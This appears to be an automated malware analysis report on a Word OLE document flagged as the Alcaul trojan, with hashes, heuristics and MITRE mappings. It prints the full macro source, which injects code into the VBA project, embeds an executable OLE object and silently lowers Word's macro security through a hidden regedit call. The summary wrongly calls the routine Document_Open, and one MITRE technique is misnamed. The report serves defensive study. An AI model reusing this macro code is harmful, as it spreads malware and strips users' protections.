Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 392dc17f42121188…

MALICIOUS

Office (OLE)

Size: 34.5 KB
Created: 1998-03-28 22:38:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 28d04758c604248dbeb3a32d54966258
SHA-1: 25f9eed3728279961039ee1e042383e7a93552c4
SHA-256: 392dc17f421211884a6d141439593d3c350286c7fddf9dc549a39d847ed98da0
Risk Score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1204.002 Malicious File
  • T1137.001 DLL Search Order Hijacking

The VBA macro executes a Document_Open subroutine which writes a script to 'c:\xploit.txt', then attempts to insert this script into the current document's VBA project. It also adds an OLE object 'c:\click2X.com' and modifies registry keys to lower Word's macro security settings, enabling further execution. Finally, it executes 'regedit /s c:\vv.reg' to apply these changes.

Heuristics (5)

  • ClamAV: Doc.Trojan.Alcaul-21 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Alcaul-21
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1499 bytes
SHA-256: ee19a7af7ecdf5dfea3438fc2f445aea5a43dadce15d2463fad091f456b2ec14
Detection: ClamAV: Win.Trojan.Alcaul-20
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub document_close()
On Error Resume Next
Open "c:\xploit.txt" For Output As 2
Print #2, "sub document_open()"
Print #2, "On Error Resume Next"
Print #2, "'by alcopaul"
Print #2, "obj = ActiveDocument.Shapes(1).OLEFormat.ClassType"
Print #2, "With ActiveDocument.Shapes(1).OLEFormat"
Print #2, "    .ActivateAs ClassType:=obj"
Print #2, "    .Activate"
Print #2, "End With"
Print #2, "end sub"
Close 2
Set fso = CreateObject("Scripting.FileSystemObject")
Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\xploit.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
ActiveDocument.Shapes.AddOLEObject _
FileName:="c:\click2X.com", _
LinkToFile:=False
ActiveDocument.Save
Open "c:\vv.reg" For Output As 3
Print #3, "REGEDIT4"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, """AccessVBOM""=dword:00000001"
Close 3
Shell "regedit /s c:\vv.reg", vbHide
Kill "c:\vv.reg"
End Sub